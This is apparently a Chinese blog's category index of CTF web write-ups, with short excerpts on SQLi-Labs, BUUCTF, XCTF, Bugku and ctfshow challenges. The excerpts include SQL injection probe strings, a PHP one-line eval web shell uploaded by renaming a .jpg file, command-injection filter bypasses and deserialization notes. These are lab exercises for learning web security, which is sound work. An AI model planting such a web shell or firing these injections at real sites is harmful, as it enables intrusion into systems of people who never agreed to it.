随笔分类 - CTF / Web
【Loading 16/75】Web_SQLi-Labs_WriteUp
摘要:Less-1_GET-Error based-Single quotes-String 题目 分析 根据标题“GET-Error based-Single quotes-String(基于错误的 GET 单引号字符型注入)”可以猜到本题的闭合方法为单引号闭合,但保险起见咱还是走一遍流程。 根据页面给
Web_BUUCTF_WriteUp | [强网杯 2019]随便注
摘要:题目 分析 把 1 提交上去,得到回显如下: 输入框可输入的内容不止数字,尝试用 ' " ') ") 闭合,探测发现输入 1' and 1=1;# 和 1' and 1=2;# 的回显不同,判断为单引号闭合。 1' and 1=1;#: 1' and 1=2;#: 尝试查看当前所有数据库 1';sh
Web_Bugku_WriteUp | 聪明的php
摘要:题目 分析 翻译一下题目:传递一个参数,也许标志文件的文件名是随机的:> 于是随便传个参数 ?a,出现 php 代码: <?php include('./libs/Smarty.class.php'); echo "pass a parameter and maybe the flag file's
Web_Bugku_WriteUp | 变量1
摘要:题目 分析 <?php error_reporting(0); // 不显示报错信息 include "flag1.php"; highlight_file(__file__); if(isset($_GET['args'])){ // get传入的args值非空 _GET['ar
【Loading 13/30】ctfshow_WriteUp | WEB
摘要:web签到题 题目 web签到题 分析 F12 打开 html 文件: 将注释进行 Base64 解码得到 flag。 web2 题目 最简单的SQL注入 分析 看着应该是 SQL 注入题。 先尝试使用 admin 和 123456 登录,发现没有任何回显。看来报错被屏蔽了。 显然 admin 栏如
【Loading 19/21】Web_ctfshow_WriteUp | _新手必刷_菜狗杯
摘要:1 - web签到 题目 分析 读代码: <?php // 注释信息 /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2022-11-10 17:20:38 # @Last Modified by: h1xa # @Last Modified
Web_XCTF_WriteUp | Web_php_unserialize
摘要:题目 分析 根据题目了解到这题考察 php 反序列化漏洞。 浅读一下 php 代码: <?php class Demo { // Demo类 private $file = 'index.php'; // 私有变量file赋为字符串index.php public function __constr
Web_XCTF/BUUCTF_WriteUp | warmup
摘要:题目 分析 F12 查看源码,发现注释 <!--source.php-->,作为参数接入 url 提交,得到 php 代码: 稍做分析: <?php highlight_file(__FILE__); // 对当前文件进行 PHP 语法高亮显示 class emmm // 构造类emmm { pub
Web_XCTF_WriteUp | upload1
摘要:题目 分析 根据题目可知该题考查文件上传漏洞。 用 BurpSuite 的内置浏览器打开环境。 新建记事本编写一句话木马脚本: <?php @eval($_POST['r00ts']);?> 保存为 jpg 格式。 打开拦截,上传脚本。拦截到数据包: 将脚本后缀名更改为 php 后放行: 打开中国蚁
Web_XCTF_WriteUp | Web_php_include
摘要:题目 分析 对 php 代码进行分析: <?php // php开头 show_source(__FILE__); // 对当前源文件进行高亮显示 echo page=$_GET['page']; // 将get表单中pa
【?】Web_BUUCTF_WriteUp | [GXYCTF2019]Ping Ping Ping
摘要:题目 分析 ping 一个任意 ip: 拼一个命令试试: 看来是命令执行漏洞,直接查看 flag.php,发现存在空格过滤: 尝试绕过空格过滤: 还有 { } 符号过滤。 过滤了 flag 关键字,尝试绕过: 过滤了单双引号。 \ 符号、$+数字、$+@ 没有用。 变量拼接没有输出。 看看 in
Web_XCTF_WriteUp | unserialize3
摘要:题目 分析 根据题目指向,这题是反序列化漏洞。 分析代码: class xctf{ public $flag = '111'; // 变量flag初始化为111 public function __wakeup(){ // “__wakeup”:PHP魔术方法,在序列化后立即被调用 exit('ba
Web_XCTF_WriteUp | ics-06
摘要:题目 提示: 云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,只有一处留下了入侵者的痕迹。 题目: 分析 到处点了点,结果都是跳转回原页面。 打开 F12,发现 html 文档里的按钮大多没有链接到其他目标,除了报表中心: 点进报表中心,发现这个送分题的确认按钮也不会跳转: 查看数据包
Web_XCTF_WriteUp | PHP2
摘要:题目 分析 尝试 url 接弱密码和找 php 源码,坐牢 1h。 看了大佬的 WP 才知道 php 源码文件扩展名是 phps,于是将 url 接上 /index.phps 找到源码: 整理一下代码,大致意思是: if("admin" $_GET[id]) { // 如果传入的id值为字符串adm
Web_XCTF_WriteUp | simple_js
摘要:题目 提示: 小宁发现了一个网页,但却一直输不对密码。(Flag格式为 Cyberpeace{xxxxxxxxx} ) 题目: 分析 F12 打开查看器找到一串 JS 代码: 分析一下大致意思: function dechiffre(pass_enc){ var pass = "70,65,85,8
Web_XCTF_WriteUp | baby_web
摘要:题目 提示: 想想初始页面是哪个 题目: 分析 看到提示首先想到的是把 /1.php 删掉: 但还是回到这里。 打开 F12 再跑了一遍,拦截到三个包: 检查每个包,在 302 状态码包里找到 flag: Flag flag{very_baby_web} 参考 HTTP 状态码-菜鸟教程
Web_XCTF_WriteUp | Training-WWW-Robots
摘要:题目 分析 标题大致翻译: 训练 WWW 网络爬虫。 场景内部文段大致翻译: 在这个小小的训练挑战中,您将学习 Robots_exclusion_standard(网络爬虫排除标准)。 robots.txt 文件用于网络爬虫检查它们是否被允许抓取和索引您的网站或仅部分网站。 有时,这些文件揭示了目录
Web_XCTF_WriteUp | xff_referer
摘要:题目 提示: X老师告诉小宁其实xff和referer是可以伪造的。 题目: 分析 根据提示的内容,了解了一下 xff 和 referer。 xff:X-Forwarded-For,是一个 HTTP 扩展头部。用来表示 HTTP 请求端真实 IP。 格式:X-Forwarded-For: clien
Web_XCTF_WriteUp | command_execution
摘要:题目 提示: 小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。 题目: 分析 简单了解了一下 waf,全称 Web 应用防火墙(Web Application Firewall),工作在应用层。其功能包括: 禁止HTTP协议的非安全方法 伪装Web服务的特征 防止
【?】Web_XCTF_WriteUp | simple_php
摘要:题目 提示: 小宁听说php是最好的语言,于是她简单学习之后写了几行php代码。 题目: 分析 读代码: <?php // php脚本的开始部分 show_source(__FILE__); // 对当前文件进行php语法高亮显示 include("config.php"); // 引用confi